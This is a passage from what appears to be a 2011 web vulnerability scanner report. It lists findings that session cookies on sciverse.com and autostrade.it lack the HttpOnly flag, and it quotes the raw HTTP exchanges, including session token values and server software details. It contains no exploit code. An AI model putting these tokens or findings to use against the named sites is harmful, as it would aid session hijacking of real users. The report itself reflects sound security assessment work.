Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=D234DFFB0E233571FFF6FCFEC394BBC1; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/www.ilsole24ore.it/08/cobrand_portale_automobilista@x75
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0


15.32. http://www.applications.sciverse.com/action/appDetail/292639

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.applications.sciverse.com
Path:   /action/appDetail/292639

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID
amp.machine.id.cookie

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/appDetail/292639 HTTP/1.1
Host: www.applications.sciverse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:29:19 GMT
Server: www.applications.sciverse.com 9999
Location: http://www.applications.sciverse.com/action/userhome
Content-Length: 0
Set-Cookie: JSESSIONID=0001aGFalo1QTnjVo3O-GQjgJCK:15gmm1282; Path=/
Set-Cookie: amp.machine.id.cookie=aGFalo1QTnjVo3O-GQjgJCK; Expires=Sun, 21 May 2079 01:43:24 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/plain
Content-Language: en-US
Connection: close
X-RE-Ref: 1 -1914337877
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


15.33. http://www.autostrade.it/autostrade/isMobile.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autostrade.it
Path:   /autostrade/isMobile.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autostrade/isMobile.do HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:32 GMT
Server: Autostrade
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
x-wily-info: Clear guid=B2C604397F0000015854E99FC00F33B9
x-wily-servlet: Clear appServerIp=127.0.0.1&agentName=bau10&servletName=ActionServlet&agentHost=n0611733&agentProcess=JBoss
Set-Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript;charset=UTF-8
Content-Language: it
Content-Length: 272


var isMobile="noMobile";
var risoluzione="";

var abilitaControlloMobile=true;
if (abilitaControlloMobile && document.lo